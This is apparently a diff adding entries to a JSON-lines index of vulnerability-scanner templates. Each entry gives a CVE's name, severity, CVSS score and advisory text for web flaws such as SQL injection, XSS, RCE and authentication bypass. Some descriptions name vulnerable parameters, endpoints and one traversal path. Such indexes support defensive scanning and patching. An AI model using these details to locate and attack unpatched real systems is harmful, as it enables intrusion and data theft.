{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
|
||||
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
|
||||
{"ID":"CVE-2023-2227","Info":{"Name":"Modoboa \u003c 2.1.0 - Improper Authorization","Severity":"critical","Description":"Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-2227.yaml"}
|
||||
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
|
||||
{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
|
||||
{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"}
|
||||
|
@ -2074,6 +2079,7 @@
|
|||
{"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"}
|
||||
{"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"}
|
||||
{"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"}
|
||||
{"ID":"CVE-2023-27032","Info":{"Name":"PrestaShop AdvancedPopupCreator - SQL Injection","Severity":"critical","Description":"In the module “Advanced Popup Creator” (advancedpopupcreator) from Idnovate for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27032.yaml"}
|
||||
{"ID":"CVE-2023-27034","Info":{"Name":"Blind SQL injection vulnerability in Jms Blog","Severity":"critical","Description":"The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-27034.yaml"}
|
||||
{"ID":"CVE-2023-27159","Info":{"Name":"Appwrite \u003c=1.2.1 - Server-Side Request Forgery","Severity":"high","Description":"Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27159.yaml"}
|
||||
{"ID":"CVE-2023-27179","Info":{"Name":"GDidees CMS v3.9.1 - Arbitrary File Download","Severity":"high","Description":"GDidees CMS v3.9.1 and lower was discovered to contain an arbitrary file download vulenrability via the filename parameter at /_admin/imgdownload.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-27179.yaml"}
|
||||
|
@ -2130,6 +2136,7 @@
|
|||
{"ID":"CVE-2023-31446","Info":{"Name":"Cassia Gateway Firmware - Remote Code Execution","Severity":"critical","Description":"In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31446.yaml"}
|
||||
{"ID":"CVE-2023-31465","Info":{"Name":"TimeKeeper by FSMLabs - Remote Code Execution","Severity":"critical","Description":"An issue was discovered in FSMLabs TimeKeeper 8.0.17 through 8.0.28. By intercepting requests from various timekeeper streams, it is possible to find the getsamplebacklog call. Some query parameters are passed directly in the URL and named arg[x], with x an integer starting from 1; it is possible to modify arg[2] to insert Bash code that will be executed directly by the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-31465.yaml"}
|
||||
{"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"}
|
||||
{"ID":"CVE-2023-32077","Info":{"Name":"Netmaker - Hardcoded DNS Secret Key","Severity":"high","Description":"Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32077.yaml"}
|
||||
{"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"}
|
||||
{"ID":"CVE-2023-3219","Info":{"Name":"EventON Lite \u003c 2.1.2 - Arbitrary File Download","Severity":"medium","Description":"The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors\nto access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-3219.yaml"}
|
||||
{"ID":"CVE-2023-32235","Info":{"Name":"Ghost CMS \u003c 5.42.1 - Path Traversal","Severity":"high","Description":"Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-32235.yaml"}
|
||||
|
@ -2206,6 +2213,7 @@
|
|||
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
|
||||
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
|
||||
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
|
||||
{"ID":"CVE-2023-38964","Info":{"Name":"Academy LMS 6.0 - Cross-Site Scripting","Severity":"medium","Description":"Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38964.yaml"}
|
||||
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
|
||||
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
|
||||
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
|
||||
|
@ -2250,6 +2258,7 @@
|
|||
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
|
||||
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
|
||||
{"ID":"CVE-2023-43187","Info":{"Name":"NodeBB XML-RPC Request xmlrpc.php - XML Injection","Severity":"critical","Description":"A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43187.yaml"}
|
||||
{"ID":"CVE-2023-43208","Info":{"Name":"NextGen Healthcare Mirth Connect - Remote Code Execution","Severity":"critical","Description":"Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43208.yaml"}
|
||||
{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"}
|
||||
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
|
||||
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
|
||||
|
@ -2258,6 +2267,8 @@
|
|||
{"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"}
|
||||
{"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"}
|
||||
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
|
||||
{"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"}
|
||||
{"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"}
|
||||
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
|
||||
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
|
||||
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
|
||||
|
@ -2265,6 +2276,7 @@
|
|||
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
|
||||
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
|
||||
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
|
||||
{"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"}
|
||||
{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"}
|
||||
{"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"}
|
||||
{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
|
||||
|
@ -2283,6 +2295,7 @@
|
|||
{"ID":"CVE-2023-4973","Info":{"Name":"Academy LMS 6.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4973.yaml"}
|
||||
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
|
||||
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
|
||||
{"ID":"CVE-2023-5003","Info":{"Name":"Active Directory Integration WP Plugin \u003c 4.1.10 - Log Disclosure","Severity":"high","Description":"The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-5003.yaml"}
|
||||
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
|
||||
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
|
||||
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
|
||||
|
@ -2317,6 +2330,7 @@
|
|||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||
{"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"}
|
||||
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
|
||||
{"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"}
|
||||
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
||||
|
@ -2324,6 +2338,7 @@
|
|||
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||
{"ID":"CVE-2024-1183","Info":{"Name":"Gradio - Server Side Request Forgery","Severity":"medium","Description":"An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-1183.yaml"}
|
||||
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||
